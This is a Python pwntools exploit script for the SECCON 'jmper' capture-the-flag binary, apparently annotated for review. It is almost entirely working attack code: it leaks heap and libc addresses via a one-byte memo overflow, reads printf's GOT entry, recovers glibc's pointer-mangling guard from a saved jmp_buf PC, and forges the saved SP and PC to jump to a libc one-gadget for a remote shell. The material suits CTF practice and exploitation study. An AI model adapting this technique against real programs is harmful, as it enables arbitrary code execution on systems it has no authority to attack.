from pwn import *
# Target binary and the libc build it runs against.  The libc file name carries
# the build hash: every libc-relative constant used further down (the
# l.symbols['printf'] delta and the 0x04647C gadget offset) is valid only for
# exactly this build, so the two must stay in sync.
elf = "/root/pwn/seccon/jmper"
lib64 = "/root/pwn/seccon/libc-2.19.so-8674307c6c294e2f710def8c57925a50e60ee69e"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
# Local process (for debugging) vs. the live challenge service.  Only one of the
# two should be active; the rest of the script talks to `s`.
#s = process(elf)
s = remote('jmper.pwn.seccon.jp',5656)
e = ELF(elf)    # GOT lookups on the target; it appears to be non-PIE (fixed addresses are used below)
l = ELF(lib64)  # symbol offsets inside the matching libc
# Drain the initial menu.  The helpers below treat the "Bye :)" banner as the
# end of one menu round.
print s.recvuntil("Bye :)")
# Set to 2 for pwntools' byte-level I/O trace of the session.
DEBUG = 1
if DEBUG == 2:
    context.log_level = 'debug'
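def ROR(data, shift, size=64):
    """Rotate *data* right by *shift* bits inside a *size*-bit word.

    This is the rotate half of glibc's pointer de-mangling on x86_64
    (PTR_DEMANGLE: ror by 0x11, then XOR with the pointer guard); the
    ``xorkey`` computation below uses it to recover the guard from a
    leaked, mangled saved PC.

    Args:
        data: integer to rotate.  It is reduced modulo ``2**size`` first, so
            stray high bits or a negative value cannot bleed into the result
            (the original arithmetic formulation produced garbage there).
        shift: rotate amount, taken modulo *size*; 0 and *size* are no-ops.
        size: word width in bits (default 64).

    Returns:
        The rotated value, always in ``[0, 2**size)``.
    """
    mask = (1 << size) - 1
    data &= mask
    shift %= size
    # Low `shift` bits wrap around to the top; mask trims the overflow of the
    # left shift back into the word.
    return ((data >> shift) | (data << (size - shift))) & mask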
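def ROL(data, shift, size=64):
    """Rotate *data* left by *shift* bits inside a *size*-bit word.

    This is the rotate half of glibc's pointer mangling on x86_64
    (PTR_MANGLE: XOR with the pointer guard, then rol by 0x11); the script
    uses it to re-mangle the forged saved PC/SP before writing them back.

    Args:
        data: integer to rotate.  It is reduced modulo ``2**size`` first, so
            stray high bits or a negative value cannot bleed into the result
            (the original arithmetic formulation produced garbage there).
        shift: rotate amount, taken modulo *size*; 0 and *size* are no-ops.
        size: word width in bits (default 64).

    Returns:
        The rotated value, always in ``[0, 2**size)``.
    """
    mask = (1 << size) - 1
    data &= mask
    shift %= size
    # High `shift` bits wrap around to the bottom; mask trims the overflow of
    # the left shift back into the word.
    return ((data << shift) | (data >> (size - shift))) & mask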
def add():
    """Menu option 1: allocate a new entry.

    Echoes the server's reply up to and including the "Bye :)" banner so the
    connection is left positioned at the next menu.
    """
    s.sendline("1")
    banner = s.recvuntil("Bye :)")
    print(banner)
def name(id,t):
    """Menu option 2: set the name of entry *id* to the raw bytes *t*.

    *t* is sent verbatim (no newline appended), so the caller controls the
    terminator.  Every server prompt is echoed to stdout and the trailing
    "Bye :)" banner is consumed.
    """
    for answer in ("2", str(id)):
        s.sendline(answer)
        print(s.recv())
    s.send(t)
    print(s.recvuntil("Bye :)"))
def memo(id,t):
    """Menu option 3: set the memo of entry *id* to the raw bytes *t*.

    Same protocol shape as name(): *t* is sent verbatim (no newline
    appended), prompts are echoed, and the round is consumed through the
    "Bye :)" banner.
    """
    for answer in ("3", str(id)):
        s.sendline(answer)
        print(s.recv())
    s.send(t)
    print(s.recvuntil("Bye :)"))
def v_name(id):
    """Menu option 4: read back the name of entry *id*.

    Returns whatever the server sends after the "ID:" marker, raw (the
    callers slice the pointer bytes out of it themselves).
    """
    s.sendline("4")
    prompt = s.recv()
    print(prompt)
    s.sendline(str(id))
    header = s.recvuntil("ID:")
    print(header)
    return s.recv()
def v_memo(id):
    """Menu option 5: read back the memo of entry *id*.

    Returns the server output up to the next menu, with the two-character
    "1." menu marker that recvuntil() included stripped off the end.
    """
    s.sendline("5")
    prompt = s.recv()
    print(prompt)
    s.sendline(str(id))
    raw = s.recvuntil("1.")
    return raw[:-2]
# ---- Stage 1: heap leak + libc leak through entry 0 ----------------------
add()
# Fill the 0x20-byte memo completely (0x1f 'A' + 'B'); the 'B' is only a
# delimiter so the bytes that come back *after* it can be split off.  Whatever
# follows the memo in memory is read back by v_memo() -- presumably because the
# buffer is not NUL-terminated (TODO confirm against the binary).
memo(0,"A"*0x1f+"B\n")
# Fragile: split("B") assumes the leaked bytes themselves contain no 0x42; if
# they do, the wrong slice is taken and the low-byte check below may pass anyway.
leak_heap = v_memo(0).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
print "[*] LEAK HEAP : %x" % leak_heap
# The overwrite below subtracts 0x18 from the low byte; bail out rather than
# underflow if the heap landed such that the byte is too small (re-run instead).
if leak_heap&0xff < 0x20:
    print "FAIL"
    exit()
# One byte past the memo: rewrite the low byte of the adjacent pointer so it
# points 0x18 bytes lower.  NOTE(review): looks like this redirects the entry's
# name pointer at itself, so that name() then writes a pointer -- confirm.
memo( 0, "A"*0x20 + chr( (leak_heap&0xff) - 0x18 ) )
# Through the redirected pointer, make the name point at printf's GOT slot...
name( 0,p64(e.got['printf'])+"\n")
# ...and read it back: 6 significant bytes of a user-space libc address.
leak_libc = u64(v_name(0)[:6]+"\x00\x00")
print "[*] LIBC LEAK : %x" % leak_libc
# ---- Stage 2: same primitive on entry 1, kept for the write later ----------
add()
memo(1,"A"*0x1f+"B\n")
leak_heap = v_memo(1).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
print "[*] LEAK HEAP : %x" % leak_heap
if leak_heap&0xff < 0x20:
    print "FAIL"
    exit()
memo( 1, "A"*0x20 + chr( (leak_heap&0xff) - 0x18 ) )
# Heap offsets are build/layout specific: jmper is assumed to be the heap
# object holding the jmp_buf, and ret the slot of its saved (mangled) PC.
jmper = leak_heap-0x180
ret = jmper+0x30
# Known plaintext: the address the saved PC held before mangling (fixed, the
# binary appears to be non-PIE).  Needed to recover the pointer guard below.
ori_ret = 0x00400C31
add()
# print "PID : %d" % util.proc.pidof(s)[0]
# raw_input()
# Point entry 1's name at the jmp_buf slot and read the mangled saved PC.
name( 1, p64(ret)+"\n" )
leak_ret = u64(v_name(1)[8:16])
# PTR_DEMANGLE: ror 0x11 then XOR.  Since the plaintext is known, the XOR
# recovers the per-process pointer guard.
xorkey = ROR(leak_ret,0x11) ^ ori_ret
# One-gadget in this exact libc build (offset relative to printf); it will not
# work against any other libc.
oneshot = leak_libc - l.symbols['printf'] + 0x04647C
# PTR_MANGLE the forged values: the gadget as the new PC, and an RSP inside
# the heap -- presumably so the gadget's stack constraint is satisfied
# (TODO confirm the +0x400 region is writable and quiet).
rreett = ROL(oneshot^xorkey,0x11)
rsp = ROL((leak_heap+0x400)^xorkey,0x11)
print "[*] LEAK JMPER_ADDR : %x" % jmper
print "[*] LEAK RET : %x" % leak_ret
print "[*] XOR KEY : %x" % xorkey
print "[*] change,xor : %x,%x" % (oneshot,rreett)
print (p64(rsp)+p64(rreett)).encode('hex')
add()
# Overwrite the two consecutive jmp_buf slots (saved SP, then saved PC).
name (1,p64(rsp)+p64(rreett)+"\n")
# Spam "add" to trigger the longjmp that consumes the forged jmp_buf;
# the count of 27 is empirical (TODO: tie it to the binary's entry limit).
s.send("1\n"*27)
s.interactive()